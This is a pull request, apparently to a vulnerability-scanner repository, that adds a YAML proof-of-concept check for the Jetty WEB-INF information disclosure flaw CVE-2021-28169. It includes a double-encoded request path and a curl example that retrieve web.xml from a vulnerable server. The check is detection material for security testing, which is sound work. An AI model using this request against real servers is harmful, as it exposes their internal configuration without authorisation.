### PR TITLE
Jetty WEB-INF 敏感信息泄露漏洞（CVE-2021-28169）

### DIFF
--- a/pocs/jetty-cve-2021-28169.yml
+++ b/pocs/jetty-cve-2021-28169.yml
@@ -9,4 +9,4 @@ detail:
     CVE: Jetty WEB-INF 敏感信息泄露漏洞（CVE-2021-28169）
     Author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x)
     links:
-      - https://www.linuxlz.com/aqld/2309.html
+        - https://www.linuxlz.com/aqld/2309.html

--- a/pocs/jetty-cve-2021-28169.yml
+++ b/pocs/jetty-cve-2021-28169.yml
@@ -1,12 +1,10 @@
 name: poc-yaml-jetty-cve-2021-28169
 rules:
-    - method: GET
-      path: /static?/%2557EB-INF/web.xml
-      expression: |
-         response.status == 200 && response.body.bcontains(b"web-app")
+  - method: GET
+    path: /static?/%2557EB-INF/web.xml
+    follow_redirects: false
+    expression: response.status == 200 && response.body.bcontains(b"web-app") && response.body.bcontains(b"url-pattern")
 detail:
-    VulnUrl: curl -v  http://domain:port/static?/%2557EB-INF/web.xml
-    CVE: Jetty WEB-INF 敏感信息泄露漏洞（CVE-2021-28169）
-    Author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x)
-    links:
-        - https://www.linuxlz.com/aqld/2309.html
+  author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x)
+  links:
+    - https://www.linuxlz.com/aqld/2309.html

--- a/pocs/jetty-cve-2021-28169.yml
+++ b/pocs/jetty-cve-2021-28169.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-jetty-cve-2021-28169
+rules:
+    - method: GET
+      path: /static?/%2557EB-INF/web.xml
+      expression: |
+         response.status == 200 && response.body.bcontains(b"web-app")
+detail:
+    VulnUrl: curl -v  http://domain:port/static?/%2557EB-INF/web.xml
+    CVE: Jetty WEB-INF 敏感信息泄露漏洞（CVE-2021-28169）
+    Author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x)
+    links:
+      - https://www.linuxlz.com/aqld/2309.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Jetty WEB-INF 敏感信息泄露漏洞（CVE-2021-28169）
## 测试环境
https://github.com/vulhub/vulhub/tree/master/jetty
## 备注
<img width="641" alt="截屏2021-08-17 下午1 10 34" src="https://user-images.githubusercontent.com/89016498/129667690-d8c9dba6-fab1-4563-b9f0-b1892b050f3b.png">
